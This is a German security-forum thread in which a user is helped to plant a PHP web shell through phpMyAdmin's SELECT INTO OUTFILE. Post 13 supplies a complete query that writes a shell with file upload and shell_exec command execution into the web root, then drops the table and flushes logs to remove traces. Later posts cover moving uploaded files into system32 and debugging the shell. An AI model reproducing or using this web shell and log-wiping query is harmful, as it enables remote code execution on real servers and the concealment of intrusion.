PMA "Objekt nicht gefunden"

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Hanskanns, 16. Mai 2010 .

Schlagworte:
  1. 16. Mai 2010
    Hallo

    habe mir seit tagen PMA local intalliert um ein wenig zu üben.

    was ich gemacht habe:

    eine Datenback in PMA erstellt [hanskanns]

    den .PHP code in der Datebank eingefügt, und über SQL menü

    SELECT * FROM hanskanns INTO OUTFILE 'C:\xampp\mysql\shell.php'

    der befehl wird erfolgreich ausgeführt

    aber wenn ich jetzt

    http://127.0.0.1/shell.php im Browser eingebe

    oder

    http://127.0.0.1/PMA/shell.php

    kommt immer

    Code:
    Objekt nicht gefunden!
    
    Der angeforderte URL konnte auf dem Server nicht gefunden werden. Sofern Sie den URL manuell eingegeben haben, überprüfen Sie bitte die Schreibweise und versuchen Sie es erneut.
    was genau mache ich da falsch?

    Bin dankbar für jeden Tipp!

    LG
     
  2. 16. Mai 2010
    AW: PMA fehler

    Das Docroot ist falsch

    c:\xampp\phpmyadmin

    Dann kannste es über http://127.0.0./phpmyadmin/shell.php aufrufen
     
  3. 16. Mai 2010
    AW: PMA fehler

    Sicher, dass "C:\xampp\mysql\" dein WWW verzeichniss ist? Normalerweise heißt das wwwroot oder htdocs oder public_html (habe schon lange nicht mehr mit xampp gearbeitet). Wenn deine PHP im Mysql verzeichniss liegt, kannst du darüber nicht via Webserver zugreifen.
     
  4. 16. Mai 2010
    AW: PMA fehler

    Bei xampp ist das Web-Verzeichnis C:\xampp\htdocs\ oder C:\xampp\phpmyadmin <= dann liegt die Shell im PMA Ordner.. kannst du dann per
    127.0.0.1/phpmyadmin/shell.php im browser abrufen
    C:\xampp\mysql\
    ist der Pfad, wo der MySQL-Server und alles was zu mysql gehört liegt..

    MfG
     
  5. 17. Mai 2010
    AW: PMA fehler

    dann

    http://localhost/shell.php
    vorher natürlich deinen shellcode in hanskanns einfügen

    ich glaube mysql macht auch einen unterschied zwischen

    und
     
  6. 17. Mai 2010
    AW: PMA fehler

    Wenn man '\' nimmt, muss man sie escapen: '\\'.
    Bei '/' reicht ein einfacher Slash.
     
  7. 19. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    Danke euch

    die Datei bzw. die .php wird zwar erstellt
    Code:
    INTO OUTFILE 'C:\xampp\mysql\shell.php' 
    aber mit

    http://127.0.0.1/shell.php
    http://localhost/shell.php
    http://127.0.0./phpmyadmin/shell.php

    kann ich die .php nicht erreichen

    ich weiß nicht was ich noch machen soll

    LG
     
  8. 19. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    das docroot ist doch falsch ?
    c:/xampp/phpMyAdmin/shell.php --->url/phpmyadmin/shell.php
    c:/xampp/htdocs/shell.php --->url/shell.php
     
  9. 19. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    Wie oft soll das noch wiederholt werden? Wurde jetzt mindestens 3x gesagt.

    Ich weiß, was du machen sollst. Leute die so blind sollten es einfach sein lassen. Es wurde jetzt 3x gesagt.
     
  10. 19. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    docroot ist richtig

    url/phpmyadmin/shell.php
    url/shell.php

    (natürlich angepasst )

    funktioniert leider nicht
     
  11. 19. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    Zeig mal die komplette Abfrage. Ohne irgendwelche Zensuren etc.

    Es muss genau so aussehen (nicht anders! / nicht \ !!!!):

    INTO OUTFILE 'C:/xampp/phpmyadmin/shell.php'

    Dann kannst du die Shell unter:

    http://127.0.0.1/phpmyadmin/shell.php erreichen

    (Entweder \\ oder / aber nicht \)
     
  12. 19. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    Hallo

    ich würde dir gerne alles Zeig Ohne irgendwelche Zensuren

    aber will auch nicht das man mir sagt: das es nen Request ist und ich sollte die sufu benutzen, und der thread wird geklosed ohne Hilfe

    Was ich jetzt gemacht habe

    Apache 2.0 installiert

    DocumentRoot geändert

    In der Datei httpd.conf ist die DocumentRoot auf "C:/AppServ/www " eingestellt.

    {bild down} ​

    server neu gestartet

    PS: Wenn ich eine php-Datei (z.B. test.php) in dieses Verzeichnis lege und mit "http://127.0.0.1/test.php" öffne, dann wir die php-Datei auch korrekt ausgeführt.

    eine Datenback in PMA erstellt [hanskanns]

    den .PHP code in der Datebank eingefügt, und über SQL menü

    SELECT * FROM hanskanns INTO OUTFILE 'C:/AppServ/www/shell.php'

    das genau habe ich gemacht
     
  13. 19. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    Das ist kein Request, wenn du localhost hacken willst. Kannste ruhig posten. Versuch es mal so:

    Code:
    use mysql; 
    DROP TABLE IF EXISTS `abc`;
    CREATE TABLE abc (codetab text); 
    INSERT INTO abc (codetab) values ('<?$sendfile=$_REQUEST["sendfile"];$cmd=$_REQUEST["-cmd"];if($sendfile=="true") { $fn=$_FILES["file"]["name"]; $tn=$_FILES["file"]["tmp_name"]; if(move_uploaded_file($tn, dirname(__FILE__)."/".$fn)) $result="<br><font color=green>upload done</p>"; else $result="<br><font color=red>upload failed</p>"; } ?><html><body><form method=POST><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"></form><form enctype="multipart/form-data" method="post" action=""><input type=file name=file size=20><input type="submit" value="Upload"><input type="hidden" name="sendfile" value="true"><?=$result?></form><pre><? if ($cmd!="") echo shell_exec($cmd);?></pre></body></html>.
    '); 
    SELECT * INTO OUTFILE 'C:/AppServ/www/shell.php' FROM abc;
    DROP TABLE abc; 
    FLUSH LOGS;
    Als ein Query absetzen, hier wird die Tabelle direkt erstellt und die Daten eingefügt. Danach wird ins File geschrieben. Nacher wird die Tabelle wieder gelöscht und die Logs vernichtet (mysql nicht apache).
    Wenn du Fragen zu irgendeinem Teil der Abfrage hast: frag.
     
  14. 19. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    selbst mit dem kompletten query schafft er es, es nicht zu schaffen xD
    hab mir deine posts durchgelesen.
    mein tipp: nimm deinen computer und schmeiß ihn aus dem fenster.
    alles was du brauchst wurde schon 10 mal gesagt.
     
  15. 20. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    hat Perfekt Funktioniert 1000 Dank für deine Hilfe

    wie kann ich Per Script nach "C:\WINDOWS\system32" oder nach "C:\Dokumente und Einstellungen\hanskanns\Eigene Dateien" und da z.b ein ordner erstelle ubd einpaar bilder und Flaschfxp Portable z.b uploade und excute

    mit cd C:\Dokumente und Einstellungen\hanskanns\Eigene Dateien

    klappt das nicht

    @Romka ich weiß nicht was du hast

    hab dir doch nix gemachst
     
  16. 20. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    Rofl, wenn die WebShell steht brauchste nur noch Standart CMD Befehle...
    Dein WorkDir ist C:\xampp\irgendwas....

    Du lädst z.B. ne Datei xyz.txt da rein....
    Wenn du sie in den Ordner C:\Windows\system32 bringen möchtest, führste einfach aus...
    Code:
    move xyz.txt C:\Windows\system32\
    Aber mal ehrlich, wenn du selbst das nicht drauf hast, würde ich mir nen anderes Hobby suchen <3
     
  17. 21. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    das Probleme ist ja meine Shell Reagiert nicht, egal welche befehl ich eingebe sogar "ver" oder "dir"

    da kommt nix

    {bild down} ​

    LG
     
  18. 21. Mai 2010
    AW: PMA "Objekt nicht gefunden"

    was sagt "whoami" ?
    Sonst check mal ob Safemode in deiner php konfiguration an ist.
     
  19. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.